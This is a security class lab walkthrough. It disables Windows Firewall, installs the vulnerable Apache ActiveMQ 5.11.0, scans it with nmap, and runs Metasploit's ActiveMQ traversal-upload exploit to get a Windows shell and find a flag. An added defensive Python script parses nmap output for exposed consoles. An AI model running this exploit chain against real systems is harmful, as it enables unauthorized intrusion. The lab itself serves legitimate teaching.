H 310: Metasploit v. ActiveMQ (20 pts)

What you need


To practice using Metasploit to exploit a vulnerable Windows application.

Task 1: Preparing the Windows Target

Turning Off Windows Firewall

At the lower left of the Windows desktop, click the magnifying glass icon.


In the Search results, click "Windows Firewall", the second result in the image below.

In the Windows Firewall box, on the left side, click "Turn Windows Firewall on or off".

Check both of the boxes labelled "Turn off Windows Firewall (not recommended)", as shown below.

Click OK.

Installing Java

On your Windows system, in Firefox, go to

Click the red "Java Download" button. Download and install the recommended version. When I did it on May 21, 2020, it was "jre-8u251-windows-x64".

Installing Apache ActiveMQ v5.11.0

This is an old server product with known vulnerabilities. We'll run it, and see how using old software can endanger a modern operating system.

On your Windows system, in Firefox, go to:

Download the apache-activemq-5.11.0-bin.zip file, as shown below.

Open your Downloads folder. Right-click the apache-activemq-5.11.0-bin.zip file and click "Extract All...", Extract.

An "apache-activemq-5.11.0-bin" window opens. From its menu bar, click File, "Open Command Prompt".

Starting ActiveMQ

In the Command Prompt window, execute these commands:

cd apache-activemq-5.11.0
bin\activemq.bat start

ActiveMQ starts, showing "ActiveMQ WebConsole available at" as shown below.

Task 2: Preparing the Debian Server

Installing Metasploit

In an SSH session to your Debian server, execute these commands:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Metasploit installs, as shown below.

Installing Nmap

Execute this command:

sudo apt install nmap

Enter y to install the package.

Nmap installs, as shown below.

Testing the Target Server

On your Kali Linux machine, in the Terminal window, execute this command, as shown below, replacing the IP address with the IP address of your Windows Server 2016 machine.

sudo nmap -sV -p8161

You should see the port open, as shown below.
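
From the defender's side, the same port check can be run across your own hosts and the results filtered for machines that expose the ActiveMQ web console port. The script below is an added example, not part of the original lab: it parses nmap grepable output (the `-oG` format) and lists hosts with 8161/tcp open. The scan lines, addresses, hostnames and banner in `SAMPLE_SCAN` are constructed, and the function name is hypothetical.

```python
import re

# Constructed sample of `nmap -sV -p8161 -oG -` output. Addresses come from the
# 192.0.2.0/24 documentation range; hostnames and banners are made up.
SAMPLE_SCAN = "\n".join([
    "# Nmap scan initiated (constructed sample)",
    "Host: 192.0.2.10 (win2016.lab.example)\tStatus: Up",
    "Host: 192.0.2.10 (win2016.lab.example)\tPorts: 8161/open/tcp//http//Jetty 8.1.16.v20140903/",
    "Host: 192.0.2.11 ()\tStatus: Up",
    "Host: 192.0.2.11 ()\tPorts: 8161/closed/tcp//unknown///",
    "Host: 192.0.2.12 ()\tStatus: Up",
    "Host: 192.0.2.12 ()\tPorts: 8161/filtered/tcp//unknown///",
    "# Nmap done (constructed sample)",
])

WEB_CONSOLE_PORT = 8161  # the port probed in the lab step above

HOST_RE = re.compile(r"^Host: (\S+) \((.*?)\)$")


def exposed_consoles(grepable, port=WEB_CONSOLE_PORT):
    """Return (ip, hostname, service, version) for each host with `port` open."""
    findings = []
    for line in grepable.splitlines():
        fields = line.split("\t")
        host = HOST_RE.match(fields[0])
        if not host:
            continue  # comment lines and anything that is not a Host record
        for field in fields[1:]:
            if not field.startswith("Ports: "):
                continue
            for entry in field[len("Ports: "):].split(", "):
                # Entry layout: port/state/protocol/owner/service/rpcinfo/version/
                parts = entry.split("/")
                if len(parts) < 7:
                    continue  # malformed entry, skip rather than guess
                if parts[0] == str(port) and parts[1] == "open" and parts[2] == "tcp":
                    findings.append((host.group(1), host.group(2), parts[4], parts[6]))
    return findings


if __name__ == "__main__":
    for ip, name, service, version in exposed_consoles(SAMPLE_SCAN):
        print(f"{ip} ({name or 'no name'}) exposes {WEB_CONSOLE_PORT}/tcp: {service} {version}")
```

Hosts reported as closed or filtered are left out, so the list shows only machines where the console is reachable from the scanning position.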

Task 3: Exploiting the Windows Target

Finding a Metasploit Exploit

On your Debian server, execute this command:

msfconsole -q

It asks if you want to set up a database. Reply no.

At the msf5 > prompt, execute this command:

search activemq

A list of exploits appears, as shown below.

Notice that one of them clearly claims to work on version 5.11, outlined in yellow in the image below.

Selecting Options and Target

At the msf5 > prompt, execute these commands:

use exploit/windows/http/apache_activemq_traversal_upload
show options

The options required for this exploit are listed. The required options are RHOSTS and LHOST, as shown below.

At the metasploit prompt, execute these commands, using the correct IP addresses for your Windows and Linux systems, respectively:

You get a shell, as shown below. Press Enter to see a Windows prompt.

H 310.1: Java Module (20 pts)

In the shell, execute this command:

tasklist /m java*

Find the Module name, which is covered by a green box in the image below. That's the flag.

Posted 5-21-2020
Flag number fixed 8-4-20